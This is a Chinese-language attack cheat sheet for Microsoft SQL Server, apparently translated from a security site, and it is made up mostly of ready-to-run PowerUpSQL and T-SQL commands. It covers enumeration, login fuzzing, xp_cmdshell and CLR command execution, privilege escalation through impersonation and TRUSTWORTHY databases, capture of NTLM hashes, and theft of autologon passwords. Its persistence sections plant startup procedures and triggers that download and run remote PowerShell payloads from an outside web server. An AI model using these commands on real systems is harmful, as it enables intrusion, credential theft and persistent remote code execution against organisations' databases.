|

数据库枚举的基本 SQL Server 查询
#View all db in an instanceGet-SQLQuery -Instance <instance> -Query &#34;SELECT name FROM sys.databases&#34;#View all tablesGet-SQLQuery -Instance <instance> -Query &#34;SELECT * FROM Employees.INFORMATION_SCHEMA.TABLES&#34; #View all cols in all tables in a dbGet-SQLQuery -Instance <instance> -Query &#34;SELECT * FROM Employees.INFORMATION_SCHEMA.columns&#34;#View data in tableGet-SQLQuery -Instance <instance> -Query &#34;USE Employees;SELECT * FROM ITEmployees&#34;
枚举 SPN / 查找 MSSQL 服务器
#TCP/UDP port scanGet-SQLInstanceScanUDP#DB in the domainGet-SQLInstanceDomain#Local DBGet-SQLInstanceLocal
收集信息
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
检查访问
Get-SQLConnectionTestThreadedGet-SQLInstanceDomain | Get-SQLConnectionTestThreaded -VerboseGet-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Username sa -Password Password -Verbose
枚举数据库用户
Get-SQLFuzzServerLogin -Instance <instance> -Verbose
检查模拟权
Invoke-SQLAudit -Verbose -Instance instance.domain.local
枚举 SQL Server 链接
- 数据库链接允许 SQL Server 访问外部数据源,如其他 SQL Server 和 OLE DB 数据源。
- 在 SQL 服务器之间的数据库链接的情况下,即链接的 SQL 服务器,可以执行存储过程。
- 数据库链接甚至可以跨林信任工作。
Get-SQLServerLink -Instance <instance> -Verbose#Orselect * from master..sysservers
枚举数据库链接
Get-SQLServerLinkCrawl -Instance <instance> -Verbose#Orselect * from openquery(&#34;<instance>&#34;,&#39;select * from openquery(&#34;<instance2>&#34;,&#39;&#39;select * from master..sysservers&#39;&#39;)&#39;)
枚举域用户
Get-SQLFuzzDomainAccount -Instance <instance.domain.local> -StartId 500 -EndId 2000 -Verbose
命令执行xp_cmdshell
- 在目标服务器上,任何一个xp_cmdshell都应该已经启用;
- 如果启用rpcout(默认禁用),xp_cmdshell可以使用以下命令启用:
EXECUTE(&#39;sp_configure &#39;&#39;Show Advanced Options&#39;&#39;,1;reconfigure;&#39;) AT &#34;<instance>&#34; EXECUTE(&#39;sp_configure &#39;&#39;xp_cmdshell&#39;&#39;,1;reconfigure;&#39;) AT &#34;<instance>&#34;
- 如果rpcout被禁用但我们是sa,则可以使用EXEC sp_serveroption &#39;LinkedServer&#39;, &#39;rpc out&#39;, &#39;true&#39;。
通过 DB 链接执行的命令:
Get-SQLServerLinkCrawl -Instance <instance> -Query &#34;exec master..xp_cmdshell &#39;whoami&#39;&#34;Get-SQLServerLinkCrawl -Instance <instance> -Query &#39;exec master..xp_cmdshell &#34;powershell -c iex (new-object net.webclient).downloadstring(&#39;&#39;http://172.16.100.168:8080/Invoke-HelloWorld.ps1&#39;&#39;)&#34;&#39;#Orselect * from openquery(&#34;<instance>&#34;,&#39;select * from openquery(&#34;<instance2>&#34;,&#39;&#39;select * from openquery(&#34;<instance3>.domain.local&#34;,&#39;&#39;&#39;&#39;select @@version as version;exec master..xp_cmdshell &#34;powershell whoami)&#39;&#39;&#39;&#39;)&#39;&#39;)&#39;)
使用 PowerUpSQL:
Invoke-SQLOSCmd -Username sa -Password <password> -Instance <instance> -Command whoami
扩展存储过程
- 充当 SQL 服务器扩展的 DLL。DLL 需要在磁盘上。
- 在 DLL 中注册每个扩展存储过程都需要 sysadmin 权限。
- 以服务帐户的权限执行,并在 SQL Server 的进程空间中运行。
- DLL 可以具有任何文件扩展名,也可以从 UNC 路径或 Webdav 加载。
Create-SQLFileXpDll -OutFile C:\fileserver\xp_calc.dll -Command &#34;calc.exe&#34; -ExportName xp_calcGet-SQLQuery -UserName sa -Password <password> -Instance <instance> -Query &#34;sp_addextendedproc &#39;xp_calc&#39;, &#39;\\192.168.15.2\fileserver\xp_calc.dll&#39;&#34;Get-SQLQuery -UserName sa -Password <password> -Instance <instance> -Query &#34;EXEC xp_calc&#34;
列出现有的扩展过程
Get-SQLStoredProcedureXP -Instance <instance> -Verbose
CLR 程序集
- CLR(Common Language Runtime)是.NET框架提供的运行时环境。SQL Server 支持 CLR 集成,它允许通过导入 DLL 来编写存储过程和其他内容。
- CLR 集成默认关闭,默认情况下需要系统管理员权限才能使用它。创建程序集、更改程序集或DDL_Admin角色也可以使用它。
- 执行以服务帐户的权限进行。
use msdbGO-- Enable show advanced options on the serversp_configure &#39;show advanced options&#39;,1RECONFIGUREGO-- Enable clr on the serversp_configure &#39;clr enabled&#39;,1RECONFIGUREGO-- Import the assemblyCREATE ASSEMBLY my_assemblyFROM &#39;\\192.168.15.2\fileserver\cmd_exec.dll&#39;WITH PERMISSION_SET = UNSAFE;GO-- Link the assembly to a stored procedureCREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];GOcmd_exec &#39;whoami&#39;-- CleanupDROP PROCEDURE cmd_execDROP ASSEMBLY my_assembly
使用 PowerUpSQL
#Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal stringCreate-SQLFileCLRDll -ProcedureName &#34;runcmd&#34; -OutFile runcmd -OutDir C:\Users\user\Desktop#Execute command using CLR assemblyInvoke-SQLOSCmdCLR -Username sa -Password <password> -Instance <instance> -Command &#34;whoami&#34; -Verbose#List all the stored procedures added using CLRGet-SQLStoredProcedureCLR -Instance <instance> -Verbose
Ole 自动化程序
- 允许使用 SQL 查询使用 COM 对象的系统存储过程。
- 默认关闭。启用它需要 syadmin 权限。
- 执行权限,sp_OACreate也sp_OAMethod可用于执行。
- 执行以服务帐户的权限进行。
Invoke-SQLOSCmdCLR -Username sa -Password <password> -Instance <instance> -Command &#34;whoami&#34; -VerboseInvoke-SQLOSCmdCLR -Username sa -Password <password> -Instance <instance> -Command &#34;powershell –e <base64encodedscript>&#34; -Verbose
代理工作
- SQL Server 代理是执行计划任务或作业的 Windows 服务。
- 可以调度、执行作业以响应警报或使用sp_start_job存储过程。
- 需要 sysadmin 角色才能创建作业。
- 也可以使用在 msdb 数据库中具有SQLAgentUserRole、SQLAgentReaderRole和SQLAgentOperatorRole固定数据库角色的非系统管理员用户。
- 如果未配置代理帐户,则使用 SQL Server 代理服务帐户的权限执行。
-- PowerShellUSE msdbEXEC dbo.sp_add_job @job_name = N&#39;PSJob&#39;EXEC sp_add_jobstep @job_name = N&#39;PSJob&#39;, @step_name = N&#39;test_powershell_name1&#39;, @subsystem = N&#39;PowerShell&#39;, @command = N&#39;powershell.exe -noexit ps&#39;, @retry_attempts = 1, @retry_interval = 5EXEC dbo.sp_add_jobserver @job_name = N&#39;PSJob&#39;EXEC dbo.sp_start_job N&#39;PSJob&#39;-- EXEC dbo.sp_delete_job @job_name = N&#39;PSJob&#39;-- CmdExecUSE msdbEXEC dbo.sp_add_job @job_name = N&#39;cmdjob&#39; EXEC sp_add_jobstep @job_name = N&#39;cmdjob&#39;, @step_name = N&#39;test_cmd_name1&#39;, @subsystem = N&#39;cmdexec&#39;, @command = N&#39;cmd.exe /k calc&#39;, @retry_attempts = 1, @retry_interval = 5EXEC dbo.sp_add_jobserver @job_name = N&#39;cmdjob&#39;EXEC dbo.sp_start_job N&#39;cmdjob&#39;;-- EXEC dbo.sp_delete_job @job_name = N&#39;cmdJob&#39;
使用 PowerUpSQL
Invoke-SQLOSCmdAgentJob -Subsystem PowerShell -Username sa -Password <password> -Instance <instance> -Command &#34;powershell –e <base64encodedscript>&#34; -Verbose -Subsystem CmdExec -Subsystem VBScript -Subsystem Jscript
其他脚本:
R
sp_configure &#39;external scripts enabled&#39;GOEXEC sp_execute_external_script @language=N&#39;R&#39;,@script=N&#39;OutputDataSet <- data.frame(system(&#34;cmd.exe /c dir&#34;,intern=T))&#39;WITH RESULT SETS (([cmd_out] text));GO-- Grab Net-NTLM hash@script=N&#39;.libPaths(&#34;\\\\testhost\\foo\\bar&#34;);library(&#34;0mgh4x&#34;)&#39;-- Or@script=N&#39;OutputDataSet <-data.frame(shell(&#34;dir&#34;,intern=T))&#39;
Python
EXEC sp_execute_external_script @language =N&#39;Python&#39;,@script=N&#39;import subprocess p = subprocess.Popen(&#34;cmd.exe /c whoami&#34;, stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), &#34;utf-8&#34;)])&#39;WITH RESULT SETS (([cmd_out] nvarchar(max)))
PowerUpSQL
#RInvoke-SQLOSCmdR -Username sa -Password <password> -Instance <instance> -Command &#34;powershell –e <base64encodedscript>&#34; -Verbose#PythonInvoke-SQLOSCmdPython-Usernamesa-Password<password>-Instance<instance>-Command&#34;powershell–e<base64encodedscript>&#34;-Verbose
权限提升
对系统管理员公开 - 模拟
可以通过User Impersonation来实现Execute AS
检查模拟权
Invoke-SQLAuditPrivImpersonateLogin -Username <username> -Password <password> -Instance <instance> -Verbose
模拟用户
Invoke-SQLAuditPrivImpersonateLogin -Instance <instance> -Exploit -Verbose
对系统管理员公开 - 值得信赖的数据库
- is_trustworthy_on用于指示 SQL Server 实例是否信任数据库及其内容的数据库属性 ( )。
- 当 TRUSTWORTHY 关闭时,模拟用户(通过使用 EXECUTE AS)将仅具有数据库范围的权限,但当 TRUSTWORTHY 打开时,模拟用户可以执行具有服务器级别权限的操作。这允许编写可以执行使用服务器级别权限的代码的程序。
- 如果 TRUSTWORTHY 设置设置为 ON,并且 sysadmin(不一定是 sa)是数据库的所有者,则数据库所有者(具有 的用户db_owner)可以将权限提升到 sysadmin。
寻找值得信赖的
SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases
PowerUpSQL
Invoke-SQLAudit -Instance <instance.domain.local> -Verbose | Out-GridViewInvoke-SQLAuditPrivTrustworthy -Instance <instance> -Verbose
寻找 db_owner 角色
use <database>SELECT DP1.name AS DatabaseRoleName, isnull (DP2.name, &#39;No members&#39;) AS DatabaseUserNameFROM sys.database_role_members AS DRM RIGHT OUTER JOIN sys.database_principals AS DP1 ON DRM.role_principal_id = DP1.principal_id LEFT OUTER JOIN sys.database_principals AS DP2 ON DRM.member_principal_id = DP2.principal_id WHERE DP1.type = &#39;R&#39;ORDER BY DP1.name;
执行为:
EXECUTE AS USER = &#39;dbo&#39;SELECT system_userEXEC sp_addsrvrolemember &#39;domain\user&#39;,&#39;sysadmin&#39;
公共服务帐户
UNC 路径注入
Invoke-SQLUncPathInjection -Verbose -CaptureIp 192.168.15.2
服务帐户到 SYSTEM
持久性 - 启动存储过程
每次重新启动 SQL 服务时重新启动的过程
-- Create a stored procedureUSE masterGOCREATE PROCEDURE sp_autopsASEXEC master..xp_cmdshell &#39;powershell -C &#34;iex (new-object System.Net.WebClient).DownloadString(&#39;&#39;http://webserver/payload.ps1&#39;&#39;)&#34;&#39;GO-- Mark the stored procedure for automatic executioEXEC sp_procoption @ProcName = &#39;sp_autops&#39;, @OptionName = &#39;startup&#39;, @OptionValue = &#39;on&#39;;-- Now, whenever the SQL Server service is restarted, the sp_autops stored procedure will be executed thereby executing our PowerShell payload-- List stored procedures marked for automatic execution:SELECT [name] FROM sysobjects WHERE type = &#39;P&#39; AND OBJECTPROPERTY(id, &#39;ExecIsStartUp&#39;) = 1;
触发器
DDL 触发器
CREATE Trigger [persistence_ddl_1]ON ALL Server -- or DATABASEFOR DDL_LOGIN_EVENTS -- See the docs below for events and event groupsASEXEC master..xp_cmdshell &#39;powershell -C &#34;iex (new-object System.Net.WebClient).DownloadString(&#39;&#39;http://webserver/payload.ps1&#39;&#39;)&#34;&#39;GO
DML 触发器
USE masterGRANT IMPERSONATE ON LOGIN::sa to [Public];USE testdbCREATE TRIGGER [persistence_dml_1]ON testdb.dbo.datatableFOR INSERT, UPDATE, DELETE ASEXECUTE AS LOGIN = &#39;sa&#39;EXEC master..xp_cmdshell &#39;powershell -C &#34;iex (new-object System.Net.WebClient).DownloadString(&#39;&#39;http://webserver/payload.ps1&#39;&#39;)&#34;&#39;GO
登录触发器
CREATE Trigger [persistence_logon_1]ON ALL SERVER WITH EXECUTE AS &#39;sa&#39;FOR LOGONASBEGINIF ORIGINAL_LOGIN() = &#39;testuser&#39;EXEC master..xp_cmdshell &#39;powershell -C &#34;iex (new-object System.Net.WebClient).DownloadString(&#39;&#39;http://webserver/payload.ps1&#39;&#39;)&#34;&#39;END;
登记处
将xp_regread(作为系统管理员)与 PowerUpSQL 一起使用。以下命令从注册表读取自动登录密码。
Get-SQLRecoverPwAutoLogon -Username sa -Password <password> -Instance <instance> -Verbose
https://hideandsec.sh/books/cheatsheets-82c/page/mssql#bkmrk-enumerate-sql-server |
|